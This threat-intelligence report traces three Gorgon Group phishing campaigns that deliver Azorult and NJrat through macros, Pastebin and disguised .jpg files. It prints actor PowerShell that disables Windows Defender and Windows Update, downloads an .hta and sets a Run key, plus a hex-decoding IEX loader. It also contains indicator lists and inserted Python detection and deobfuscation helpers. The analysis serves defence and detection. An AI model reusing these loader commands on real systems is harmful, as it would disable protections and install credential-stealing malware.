Thursday, February 6, 2020

The Triune Threat: MasterMana Returns

Author: Danny Adamitis


Prevailion’s Tailored Intelligence team has discovered new campaigns associated with the Gorgon Group, suspected Pakistan-based actors who previously operated the MasterMana botnet. While this group relies upon an amalgamation of multiple open-source and commercially available tools, they have proven themselves to be highly capable. By utilizing various 3rd party websites and services, they are able to bypass common network defense mechanisms. Recently they have added new capabilities to evade host-based detection by encoding payloads and renaming file extensions. In some cases, they took a more audacious approach by incapacitating the Windows Defender process. Once on a compromised system, the actor abused Microsoft binaries that are pre-installed on Windows operating systems. By utilizing these preinstalled Microsoft binaries and running payloads in memory, they were able to remain quite elusive.

Thus far we have associated three unique clusters of activity with this group; these transpired simultaneously and have remained active to the present day. The first cluster most closely matches the tactics, techniques and procedures (TTPs) outlined in our first report. This approach heavily utilized 3rd party services in order to evade network-based detection. In order to curtail possible host-based detection, the threat actors added a new .NET file named “office.” This program performed a User Account Control (UAC) bypass, allowing the attacker to elevate their privilege level and then turn off Windows Defender. The threat actors would ultimately deploy Azorult to harvest stored confidential credentials and data.

The second cluster implemented a different kill chain, utilizing fewer third party resources and instead relying upon resources hosted on threat actor-created domains. The group took steps to evade detection by obfuscating PowerShell scripts and renaming the file extension to “.jpg”, the picture file format. While some of these techniques might seem trivial, these methods reduced the detection rate for some open-source tools to zero on VirusTotal. Prevailion then observed the same domain being used to host both payloads and spoofed websites. One spoofed website depicted a login portal with a title of “European Union”, while a second login portal was labeled “DEWA Dubai”, presumably Dubai’s Electricity and Water Authority (DEWA). While we are not able to determine if either site was operationalized, their presence suggests there is a more targeted component to this threat actor’s activities beyond mass spamming to create the MasterMana botnet.

Documents associated with the third cluster likely targeted Spanish- and Portuguese-speaking entities. Some documents referenced hotel reservation confirmations, while some domains appeared to be typo-squatted facsimiles. Like the second cluster, this campaign relied more heavily upon threat actor-controlled infrastructure than 3rd party services. In one payload the threat actor added an easter egg, performing a character replacement that substituted “11” with “@#_**Classified code”. Lastly, the threat actors would deploy a variant of NJrat that performed host-based enumeration to determine if it was run in a virtual machine, and to detect if antivirus was present. While this threat actor doesn’t use completely custom backdoors, we assess they pose a critical threat to organizations due to their “moderately sophisticated” approach, which allows them to bypass some common detection mechanisms.

Technical Details

Cluster 1

The first cluster of activity closely matched previously documented TTPs that correlated with our previous report titled MasterMana Botnet. This activity relies heavily on various 3rd party services, likely in an attempt to bypass network security appliances. The only variation that we observed was that the group began to diversify their use of 3rd party cloud services to include Discord and They also utilized different trojans like Loki agent in lieu of Azorult, however both trojans served the same purpose of harvesting credentials.

Step 1

One new twist is that the threat actor now appeared to be sending links that, when clicked, would download a trojanized Microsoft Office file. In one instance we observed a trojanized PowerPoint file that was downloaded from a link hosted on Discord, a popular chat application service.

Step 2

The PowerPoint file contained a malicious macro. Using OleTools, we can see that if the macro is enabled it will attempt to run mshta on the shortened link hxxp://j[.]mp/ajj9j9di3. “” is another file shortening service offered by the same company that runs Bitly.
Deobfuscated output of the malicious macro after being run through OleTools

The threat actors created unique shortened links that likely correspond to each new document. The aforementioned Bitly link expanded to: iwantsecurityresearcherjobplease[.]blogspot[.]com/p/17-uth_2.html.
Bitly metrics showed this campaign focused primarily on the United States, which accounted for 21% of all activity. The second most targeted country was Germany with 11% of all activity.

We identified a second campaign that utilized the same Blogger hostname. This campaign had a shortened link of hxxp://j[.]mp/12j924i3. Of interest, the second link was created just an hour after the first one.

Bitly metrics associated with another campaign using the same Blogger hostname

Step 3

The Blogger webpage appeared to be unfinished when visited in a web browser. However, below the surface, the threat actors embedded four encoded scripts.
  1. The first script created a registry key located at “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\” that would reach out to a Pastebin URL ending in “dmDDDeCw”.
  2. The second embedded script had four sub-components.
    1. The first sub-component immediately reached out to a Pastebin link ending in “JDeaycuw.”
    2. The second sub-component created a scheduled task named “main” that would execute every 60 minutes, reaching out to the same Pastebin link ending in “JDeaycuw.”
    3. The third sub-component would create a registry key called “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Pastemm” and attempt to contact a Pastebin link ending in “uBXqWxts”.
    4. The fourth sub-component kills the winword and excel tasks.
  3. The third embedded script contained a PowerShell loader that would contact a Pastebin link ending in “qGHJqiji.”
  4. The last script was named “MySexoPhone” and attempted to deactivate security mechanisms (such as Protected View) within Microsoft Office products by modifying the registry.

Step 4

The first Pastebin link ending in “dmDDDeCw” simply said “self.close” at the time of discovery. The second Pastebin link, ending in “JDeaycuw”, was a PowerShell script that appeared to be an amalgamation of the two previously observed loaders. It started off by pinging Google to check for internet connectivity. The PowerShell script then retrieves two posts that we later identified as a process hollower and Azorult. These executables would start and then inject into calc.exe. Some entertaining details of the new downloader are the variable names “vroombrooomkrooom” and “kekedoyouloveme”, which are references to a song by the rap artist Drake.

Image showing the new and old PowerShell loader

The third Pastebin link ending in “uBXqWxts” contained a sample downloader script that reached out to a pastebin post ending in “qGHJqiji”. This was the same Pastebin link that was embedded in the third script of the Blogger webpage.

Image of the Pastebin page ending in “qGHJqiji” that turns into “office.dll”

Step 5

One new aspect of this campaign is the “office.dll” written in the .NET framework. The compilation timestamp was 2020-01-19 15:56:37. The binary mimicked a project on GitHub by 0x00-0x00 that was designed to bypass User Account Control (UAC) in Windows. According to MITRE, a UAC bypass “allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation.” This particular bypass took advantage of a Microsoft binary called Connection Manager Service Profile, or cmstp.exe, that was designed to “install a service profile with default settings appropriate to the operating system and to the user's permissions.” Once the executable elevated its privilege level, it called another function that the threat actor named “dunofrenle23”. The “dunofrenle23” function appeared to originate from a different GitHub project by Nyan-x-cat, and would disable Windows Defender protection on the local host machine. The binary would also set up a service named “NyanCat”. It is likely that this would have been run before the next two payloads, in order to help ensure they evaded detection.

Screenshot of the dunofrenle23 function used to disable Windows Defender

This is where we observed a small change, the threat actors shift from hosting their payloads from PasteBin to The first file was originally hosted on paste[.]ee/r/vDP4T, it looked like the file was a PowerShell script that was charcode base 10 encoded script. The resulting output was then obfuscated by appending “OP” in front of the hex characters instead of the standard “x0”. Once the script was deobfuscated, it revealed a .net dynamic link library file named Office, in order to avoid confusion we will refer to this file as the process hollower. Despite using these simple transforms, when the file was uploaded to VirusTotal it had a detection rate of 0.

Copy of the text file hosted on vDP4T once uploaded to Virustotal

The dll was obfuscated using an open-source project called ConfuserEx. One notable aspect was that this file’s neutral resources language was set to Akan (Ghana). Once deobfuscated we noted that most of the functions had the same names as the previous campaign such as “MyVictim.tickleme” and “VOVO.FUN”.

When run, the program passes a byte array with the PE data from the PowerShell script. It looks for calc.exe in windows\syswow64, zeros the PE headers in the buffer and calls VOVO.FUN. VOVO.FUN then launches Calculator, unmaps the existing section, allocates a new buffer in the Calculator process, writes additional payloads into the process, and resumes the thread. This allowed the threat actors to never write the malware to disk. The actors maintained persistence via scheduled tasks and registry keys, which periodically grab the injector and RAT and hollow out the memory of a process that points to a valid image on disk.

After process-hollowing is complete, it injects the second payload that was hosted on paste[.]ee/r/GTqcj. Once deobfuscated, the payload was identified as Azorult, a well-known trojan. As noted by other security researchers, Azorult has been available for sale on Russian forums at prices ranging up to $100US. Most of the functionality was geared towards harvesting credentials that could be found on the victim machine — e.g., email accounts, messenger applications (pidgin, psi+, telegram), web cookies, browser history, and cryptocurrency wallets.

It also had standard trojan functionalities, such as host-based enumeration and the ability to upload and download files, as well as take screenshots. Once the trojan had obtained the information, it would then communicate with a hard-coded IP address hxxp://

Cluster 2

Once we identified that this threat actor was active, we sought out activity that deviated from the pattern identified in cluster 1. One of the major differences with cluster 2 was the use of threat actor-created domains instead of relying upon 3rd party services. We were able to correlate these two clusters based upon the threat actor’s reuse of the same malicious Blogger hostname “newandupdates1234”, which was publicly reported upon last year. Like the previous campaign, the threat actors added a UAC bypass feature.

Step 1

The infection mechanism was once again a phishing campaign that impersonated a typical business interaction. The email enticed the victim to open the malicious Excel attachment named “Bank Details Copy.xls.”

Step 2

Presumably the victim would open the attached Microsoft Excel file and then be prompted to enable macros. However, once the macros are enabled, the Excel document appears blank. Meanwhile the macro reached out to another shortened link, hxxp://j[.]mp/hdjkashnmbxzcywu. This particular link resolved to the threat actor-controlled Blogger webpage, https://newandupdates1234[.]blogspot[.]com/p/jromas-1.html. One cheeky note: Gorgon Group continued to use this particular Blogspot hostname despite the fact that it was previously reported on at the end of October 2019 by Orange.

Step 3

Bitly metrics indicate this Blogger hostname was still used as recently as January 10th, 2019. This campaign primarily targeted the United States, which constituted 66% of all activity. The second and third most impacted countries were the Republic of Korea and India, each accounting for approximately 4% of all activity.

Bitly metrics for the shortened URL associated with cluster 2 activity
Once on the Blogger webpage, there was a single embedded script that contacted a Pastebin post ending in “NLTFaNng.”

Step 4

That Pastebin post ending in “NLTFaNng” contains some lightly obfuscated VBScript that invokes PowerShell to download a file from the threat actor-controlled domain hxxp://ascendum[.]co/.well-known/Attack.jpg. This particular file had a detection rate of zero when it was uploaded to VirusTotal in January.

The detection rate for the attack.jpg file on Virustotal

Step 5

A notable feature of the attack.jpg file is that the threat actor used the Joint Photographic Experts Group (.jpg) file extension. However, when the file is analyzed with ExifTool, it is identified as ASCII text. Once de-obfuscated it revealed a PowerShell script which runs a different UAC-bypass script called “FodhelperBypass.ps1” from GitHub; this allowed the attacker to elevate their privilege level. The script then disabled Windows Defender through the registry. Next it altered the configuration settings for the Windows Update service, wuauserv, to turn it off and prevent it from running. Next, the script attempts to download an HTA (HTML executable) file and rename it as “excel.hta”. Finally, the script configures a registry key in order to obtain persistence on the infected host machine.

Below is a snippet of the PowerShell script that disables Defender, turns off Windows Update and downloads the next .hta file.

[String]$program = "powershell.exe -w hidden Add-MpPreference -ExclusionPath '$env:appdata';
New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;
'(&(GCM*W-O*)Net.WebClient).DownloadFile('''', ''$env:appdata\excel.hta'');
start-process (''$env:appdata'\excel.hta'')'|iex;Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value ('$env:appdata'+'\'+'excel.hta');sc.exe config wuauserv start= disabled;sc.exe stop wuauserv" #default)

Unfortunately by the time we discovered this particular campaign, the webpage hxxp://ascendum[.]co/.well-known/jromas[.]hta was taken offline.
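As an added example (not Prevailion's code and not anything recovered from the campaign), the Python triage helper below applies the host-side behaviours described in this step and in cluster 1 to process-creation command lines. The log lines, shortener ids, task names and URLs it scans are constructed; the page's own PowerShell is reduced to one line with its removed URL replaced by a placeholder.

```python
"""Command-line triage for the host-side behaviours described in this report.

Added example, not Prevailion's or the actor's code. Each rule maps to a step
on the page: mshta.exe fetching a j.mp/bit.ly shortener (cluster 1), Defender
exclusion/disabling and wuauserv disabling (cluster 2), an .hta dropped and
auto-run from %APPDATA% (cluster 2), persistence pointing at Pastebin
(cluster 1), and cmstp.exe / aspnet_compiler.exe use (clusters 1 and 3).
Input is a list of process-creation command lines (e.g. Sysmon Event ID 1 or
4688 CommandLine fields); the samples below are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern


RULES = [
    Rule("mshta_shortener",
         re.compile(r"mshta(\.exe)?\s+\S*https?://(j\.mp|bit\.ly)/", re.I)),
    Rule("defender_exclusion_appdata",
         re.compile(r"Add-MpPreference\s+-ExclusionPath\s+\S*appdata", re.I)),
    Rule("defender_policy_disable",
         re.compile(r"Windows Defender.*DisableAntiSpyware\s+-Value\s+1", re.I)),
    Rule("wuauserv_disabled",
         re.compile(r"sc(\.exe)?\s+config\s+wuauserv\s+start=\s*disabled", re.I)),
    Rule("hta_from_appdata",
         re.compile(r"appdata\S*\\[^\\\s]+\.hta", re.I)),
    Rule("run_key_hta",
         re.compile(r"CurrentVersion\\Run.*\.hta", re.I)),
    Rule("pastebin_persistence",
         re.compile(r"(schtasks|CurrentVersion\\Run).*pastebin\.com", re.I)),
    # cmstp.exe also installs legitimate VPN/dial-up profiles: treat this as a
    # triage signal to pair with the parent process and .inf path, not a verdict.
    Rule("cmstp_lolbin", re.compile(r"\bcmstp(\.exe)?\b", re.I)),
    Rule("aspnet_compiler_lolbin",
         re.compile(r"\baspnet_compiler(\.exe)?\b", re.I)),
]


def triage(cmdline: str) -> list[str]:
    """Return the names of every rule that matches one command line."""
    return [r.name for r in RULES if r.pattern.search(cmdline)]


def triage_log(cmdlines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (line index, matching rule names) for each line with any hit."""
    return [(i, hits) for i, line in enumerate(cmdlines) if (hits := triage(line))]


# Constructed sample log: two benign lines and four modelled on the report.
SAMPLE_CMDLINES = [
    r'"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE" "C:\Users\u\Downloads\deck.pps"',
    r"mshta.exe http://j.mp/constructed0",  # constructed shortener id
    # cluster 2 stage, reduced to one line; the removed URL is a placeholder
    r"powershell.exe -w hidden Add-MpPreference -ExclusionPath '$env:appdata'; "
    r"New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' "
    r"-Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force; "
    r"(New-Object Net.WebClient).DownloadFile('http://example.invalid/x', '$env:appdata\excel.hta'); "
    r"Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value ('$env:appdata'+'\'+'excel.hta'); "
    r"sc.exe config wuauserv start= disabled; sc.exe stop wuauserv",
    r"sc.exe stop wuauserv",  # benign: stopping, not disabling, the service
    r'schtasks.exe /create /tn main /sc minute /mo 60 /tr "mshta.exe https://pastebin.com/raw/constructed"',
    r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe <constructed args>",
]

if __name__ == "__main__":
    for idx, hits in triage_log(SAMPLE_CMDLINES):
        print(idx, ", ".join(hits))
```

The rules are deliberately narrow (wuauserv being stopped alone is not flagged; only the start= disabled reconfiguration is), so pair them with parent-process context before escalating.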

Credential Harvesting Activities

Once we identified that the domain ascendum[.]co was used by Gorgon Group, we began to look for other malicious activity associated with it. We discovered a URLScan task where someone entered the URL hxxps://mail021connect[.]us/e/eu/ into the web browser and was redirected to “hxxp://ascendum[.]co/e/eu/”. An image of that spoofed web page is below; the image was obtained from URLScan. The web page displayed the text “European Union” and prompts users for an email address and password.

Image of the “European Union” spoofed website from URLScan

We then looked for other spoofed web pages associated with this domain, and found one result in Google’s cached web crawler dated December 30th, 2019. This page had a URL of hxxp://ascendum[.]co/d/dewa/gov/ae/dewa, that displayed “Dewa Dubai”. We surmised that this was likely intended to impersonate Dubai’s Electrical and Water Authority (DEWA), which is run by the government of the United Arab Emirates.

Google’s cache of ascendum[.]co/d/dewa/gov/ae/dewa. It is likely the site would have appeared different, as Google did not cache the accompanying image file.

While we are not able to determine if the threat actors had any success in harvesting credentials associated with either of these websites, this activity indicates there may be more targeted aspects for this particular group. It also revealed an interest in European affairs as well as utility organizations based in the Middle East.

Cluster 3

This cluster also relied more heavily upon actor-controlled infrastructure than 3rd party resources. It began with a malicious email; the majority of these documents were written in Spanish and Portuguese. One of the emails impersonates a hotel in Lisbon with an attached reservation. We believe the threat actor included references to real hotels in order to socially engineer the victim into clicking on the malicious attachments; we do not have indications that they actually compromised any hotel computer systems at this time. This cluster has been active since at least mid-October 2019, and the most recent document was created on January 27, 2020. The TTPs associated with this most recent campaign are explained below.

Step 1

The victim receives an email with a malicious Microsoft file; we observed malicious Excel, Word and RTF files. The threat actor employs either the Dynamic Data Exchange (DDE) exploit, aka CVE-2017-1999, or a malicious macro. The malicious files reach out to an embedded Bitly domain to retrieve a remote resource.

Step 2

One such Excel file was named “package”, and we identified the embedded malicious Bitly link as hxxp://bit[.]ly/2NJJILu. Once the shortened link was expanded, it resolved to hxxp://207[.]246[.]68[.]214/abc/attack.jpg. This particular Bitly link was created on 21 January, one day after the other Bitly links, and the first click of this particular campaign occurred on 23 January 2020.

Step 3

Despite being labeled as a .jpg, when the file command is run it is identified as an ASCII text file. The text was a PowerShell script that adds a couple of unnecessary connotations, likely in an attempt to evade detection by YARA rules. It then downloads two additional files hosted on the same IP address.

Image of the PowerShell loader script

Step 4

The next two files were hosted on hxxp:// and hxxp://

The first file, jancolomb.jpg, is an ASCII text file that the threat actor again renamed as a .jpg file. The file started out with a block of code where the threat actors did a character replacement of “11” with “@#_**Classified code”.
Image of the jancolomb.jpg file as it natively appeared with the “Classified code” replacement

Once fully deobfuscated, the first component reveals a script to check for internet connectivity then downloads the next file and converts the input to hex.

$Tbone='*EX'.replace('*','I');sal M $Tbone;do {$ping = test-connection -comp -count 1 -Quiet} until ($ping);$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $p22;$t= New-Object -Com Microsoft.XMLHTTP;$t.open('GET','',$false);$t.send();$ty=$t.responseText;$asciiChars= $ty -split '-' |ForEach-Object {[char][byte]"0x$_"};$asciiString= $asciiChars -join ''|M

The second file janarab.jpg had roughly the same content, the only difference being the embedded URL for the second payload hxxp://redeturismbrasil[.]com/janeiro/hashtag25janeiro.jpg.
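As an added example (not Prevailion's code and not the actor's script), the Python helper below statically reverses the two loader layers described above: the “11” to “@#_**Classified code” replacement and the dash-separated hex that the loader turns into characters and pipes to IEX. The loader text, stage-2 text and the example.invalid URL are constructed placeholders; nothing recovered is executed.

```python
"""Static deobfuscation of the cluster 3 loader layers described above.

Added example, not Prevailion's or the actor's code. It reverses, without
executing anything, the two transformations the page documents:
  1. jancolomb.jpg's character replacement of "11" with "@#_**Classified code";
  2. the next stage arriving as '-'-separated hex byte values, which the loader
     turns into characters with [char][byte]"0x$_" and pipes to IEX.
It then lists the URLs embedded in the recovered loader, since the page notes
the two downloaders differ only in that URL. All sample data is constructed.
"""
import re

CLASSIFIED_TOKEN = "@#_**Classified code"  # the easter-egg token from the report
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def undo_classified_replacement(text: str) -> str:
    """Reverse the loader's .replace('11', '@#_**Classified code') step."""
    return text.replace(CLASSIFIED_TOKEN, "11")


def decode_dash_hex(blob: str) -> str:
    """Decode '-'-separated hex bytes into text, as the loader does before IEX.

    Every element must be one or two hex digits; anything else raises
    ValueError so a truncated or corrupted download is reported rather than
    silently mis-decoded.
    """
    out = bytearray()
    for token in blob.strip().split("-"):
        if not re.fullmatch(r"[0-9A-Fa-f]{1,2}", token):
            raise ValueError(f"not a hex byte: {token!r}")
        out.append(int(token, 16))
    return out.decode("latin-1")  # [char][byte] is a 1:1 byte-to-char cast


def extract_urls(script_text: str) -> list:
    """List http(s) URLs in a recovered script (next-stage locations)."""
    return URL_RE.findall(script_text)


# Constructed loader text modelled on the report's snippet; the host is a
# placeholder and "11" has been masked the way the actor masked it.
SAMPLE_LOADER = (
    "$Tbone='*EX'.replace('*','I');sal M $Tbone;"
    "Start-Sleep -Seconds @#_**Classified code;"
    "$t= New-Object -Com Microsoft.XMLHTTP;"
    "$t.open('GET','http://example.invalid/janeiro/placeholder.jpg',$false);"
    "$t.send();$ty=$t.responseText;"
)
# Constructed, harmless stage-2 text and its dash-hex encoding as it would
# arrive in responseText.
SAMPLE_STAGE2 = 'Write-Output "constructed stage-2 placeholder"'
SAMPLE_DASH_HEX = "-".join(f"{b:02X}" for b in SAMPLE_STAGE2.encode("latin-1"))


def analyze_sample() -> dict:
    """Run both layers over the constructed samples and return the findings."""
    loader = undo_classified_replacement(SAMPLE_LOADER)
    return {
        "loader": loader,
        "next_stage_urls": extract_urls(loader),
        "stage2": decode_dash_hex(SAMPLE_DASH_HEX),
    }


if __name__ == "__main__":
    for key, value in analyze_sample().items():
        print(f"{key}: {value}")
```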

The next component creates a task that runs calc.exe at a specific time. The script appears to be a lightly modified version of the example code found on MSDN. The script will then change the default authentication credential in order to obtain a list of running processes during the system start up.

Step 5

The last step involved downloading two more files, hashtag25janeiro.jpg and janeiro25cifraocolomb.jpg. The first file, hashtag25janeiro.jpg, contains a block of encoded text that is compiled on the local system with “aspnet_compiler.exe”, producing an executable named “hackitup”. This executable attempts to elude detection through character replacements, as shown below. However, the sample was identified as NJrat, designed to harvest credentials and other confidential information. This variant sent a base64-encoded string of the current window title every time focus changed. This sample utilized the command and control server located at ducksys[.]ddns[.]net.

Strings with unnecessary replacements to avoid YARA detection

The second file was janeiro25cifraocolomb.jpg; when deobfuscated it revealed a second .NET file that the threat actor called “edo”, with execution beginning at edo.tensei.main. This may have been a reference to the anime show Naruto, which has an episode called “edo tensi”. Among the more notable features of this executable: it attempts to determine if it is running in a virtual machine such as QEMU, VMware, or VirtualBox. It also attempts to discover any antivirus products running on the machine, while performing host-based enumeration to obtain the username, the machine name and an MD5 hash of the crypto system, and to determine if it is running as admin. This sample communicated with the same command and control node located at ducksys[.]ddns[.]net:5555.

Screenshot of “tensi” function checking to see if the agent was in a Virtual Machine


In order to better protect your systems from this threat, we suggest a multifaceted approach. The first priority should be enhanced training for users in the avoidance of unsolicited emails, and never to enable macros from an untrusted source. The next concern is hardening the network, primarily through the use of email security applications, as this appears to be the initial infection vector. In order to fortify systems within the perimeter, we recommend implementing Microsoft's recommended block rules for high-risk users. This should prevent the system from running certain Windows binaries like mshta.exe, msbuild.exe and even cmstp.exe. Implementing these recommended block rules should help prevent infection from this particular threat actor and other advanced actors who use living off the land (LOL) binaries for malicious purposes. This should be one consideration, paired with a properly configured and updated anti-virus product. To defend against credential harvesting of email accounts, we recommend using a multi-factor authentication approach such as Google Authenticator, Duo or another similar product.

Indicators of Compromise

Cluster 1 - January 21 2020 Campaign
MS ppt file name: Justificante_de_pago_EUR_198.00000.pps
MS ppt file communicates with: J[.]pm\ajf3j9di3+
Bitly resolves: hxxps://iwantsecurityresearcherjobplease[.]blogspot[.]com/p/17-uth_2.html
SHA256 webpage: d595bc3f383dcc06b1208e7e4e80767182ea47c08a2165bd89a946218b8419bc
Process hollower: b8f6cad3723d1dd2219d02f930e5cda776c124387f19f3decd867495ce614eb7
Deobfuscated Azorult: 00f6f084f74d0734be4b0f1b0d864279e1cf2c4aefab588feee4c6ae47663f9f
Azorult C2: hxxp://23.106.160[.]1/Panel/7/index.php

Cluster 2 - January 10 2020 Campaign
Eml file: e632c791314fe06d2b344fd54280188d1b5e23e0fec6a3b42d6e38facb992838
Eml file: c4390c5ae31ae653eb88da62ea8754d55d8d684c88663a80d0d551c5a34e1d9c
Excel: 25246d233b7ec7bacd7a4130dadcedd54d26c9f5d840545736845ad0a583f5fc
Blogger hostname: newandupdates1234[.]blogspot[.]com/p/jromas-1.html
Threat actor-created domain:
Malicious HTA file: hxxp://ascendum[.]co/.well-known/jromas.hta

Cluster 3 - January 26 2020 Campaign
Indicators of compromise:
MS file: 530ef68defcda6f4298392450204a77b6e6c7a74fc86b0fabc7cc94633522b04
Bitly URL: hxxp://bit[.]ly/2NJJILu
Hosting payload: hxxp://207[.]246[.]68[.]214/abc/attack.jpg
Attack.jpg: 457d35905622b1f91861b9139990461f35aa383a4ecd36c848bbd875465d1839
Second downloader: hxxp://207[.]246[.]68[.]214/abc/jancolomb.jpg
Second downloader: hxxp://207.246.68[.]214/abc/janarab.jpg
Trojan URL: hxxp://redeturismbrasil[.]com/janeiro/hashtag25janeiro.jpg
Hashtag25janeiro.jpg: cda1af73bb45ed89d69e559ff3186b2e4217cf30dde5e322ecc840a98bdc2d50
Trojan URL: hxxp://redeturismbrasil[.]com/janeiro/janeiro25cifraocolomb.jpg
Edo.tensi: 36df477505c3872ddc5a0ed647665f2a0c5f2ed36d0b29a540c115d3a1906ec5
Threat actor C2: ducksys[.]ddns[.]net

Additional files associated with cluster 3

